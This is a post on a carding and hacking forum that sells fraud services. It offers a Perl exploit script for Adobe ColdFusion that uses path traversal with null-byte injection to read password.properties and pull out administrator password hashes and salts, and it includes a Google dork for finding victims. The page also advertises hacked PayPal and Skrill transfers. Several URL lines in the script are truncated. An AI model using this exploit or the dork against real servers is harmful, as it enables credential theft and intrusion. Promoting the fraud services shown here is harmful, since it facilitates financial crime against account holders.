We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
Adobe ColdFusion All Versions LFD Exploit

#1
Code:
#!/usr/bin/perl
# ColdFusion Locale File Disclosure exploit (without Metasploit)
# Google Dork: intitle:"Index of /CFIDE/" administrator
# Date: 30/07/2013
# Vendor Homepage: https://www.adobe.com/
# Author: D35m0nd142
# Tested on: Adobe ColdFusion 8 (using Backbox Linux operating system)
use LWP::UserAgent;
use HTTP::Request;
$agent = LWP::UserAgent->new();
$agent ->agent( 'Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02' );
$target = $ARGV [0];
system( "clear" );
print "+--------------------------------------------------------+\n" ;
print "       ColdFusion Locale File Disclosure exploit          \n" ;
print "                created by D35m0nd142                     \n" ;
print "+--------------------------------------------------------+\n" ;
sleep 1;
if ( $target eq '' )
{
print "Usage: perl cfexploit.pl <target>\n" ;
exit (1);
}
if ( $target !~ /http:\/\// )
{
$target = "http://$target" ;
}
@hosts = ( "$target/CFIDE/administrator/index.cfm?locale=../../../../../../ColdFusion8/lib/password.properties%00en" ,
"$target/CFIDE/administrator/index.cfm?locale=../../../../../../../ColdFusion8/lib/password.properties%00en" ,
"$target/CFIDE/administrator/index.cfm?locale=../../../../../../../../ColdFusion8/lib/password.properties%00en" ,
"$target/CFIDE/administrator/index.cfm?locale=../../../../../../../../../ColdFusion8/lib/password.properties%00en" ,
"$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properties%00en
"$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en" ,
"$target/CFIDE/wizards/common/_logintowizard.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.prope
"$target/CFIDE/wizards/common/_logintowizard.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.propertie
"$target/CFIDE/administrator/archives/index.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties
"$target/CFIDE/administrator/archives/index.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.proper
"$target/CFIDE/administrator/entman/index.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.properti
"$target/CFIDE/administrator/entman/index.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%0
"$target/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../opt/coldfusion8/lib/password.prop
"$target/CFIDE/administrator/logging/settings.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properti
"$target/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../JRun4/servers/cfusion/cfusion-ear/cfusion-wa
print "\n... Exploiting ... \n" ;
foreach $host ( @hosts )
{
$req = $agent ->request(HTTP::Request->new(GET=> $host ));
if ( $req ->is_success && $req->content !~ /Not Found/ && $req ->content !~ /Page not found/ && $req ->content !~ /Forbidden/
{
print "\n[+] Vulnerable URL: $host \n\n" ;
open (FILE, "> cf_content.txt" );
print FILE $req ->content;
close (FILE);
$grep = "grep 'password=' cf_content.txt > passwords.txt" ;
$head = "head -n 2 passwords.txt" ;
system( $grep );
print "+-------------------------------------------------+\n" ;
print " [+] ColdFusion passwords: \n" ;
print "___________________________________________________\n" ;
system( $head );
print "___________________________________________________\n" ;
sleep 1;
print "\n... Retrieving SALT ... \n\n" ;
sleep 1;
$grep = "grep '<input name=\"salt\" type=\"hidden\" value=' cf_content.txt > cf_salt.txt" ;
$salt_cut = "cut -d '=' -f 4 cf_salt.txt > cf_salt1.txt" ;
$salt_cut1 = "cut -d '\"' -f 2 cf_salt1.txt > cf_salt2.txt" ;
system( $grep );
system( $salt_cut );
system( $salt_cut1 );
print "+---------------------------+" ;
print "\n [+] SALT: \n" ;
print "_____________________________\n" ;
system( "cat cf_salt2.txt" );
print "_____________________________\n" ;
sleep (1.3);
exit (0);
}
else
{
open (FILE, ">> cf_content.txt" );
print FILE "[-] not vulnerable!" ;
close (FILE);
}
}
# D608F33FA6F46BED   1337day.com [2013-08-01]   9214F0203F72A18D #
Reply
Paid adv. expire in 47 days
CLICK to buy Advertisement !

    Verified & Trusted HACKED Payza, PayPal, Ukash, Ucard, EgoPay, Skrill - TRANSFER [Escrow accepted]




Forum Jump: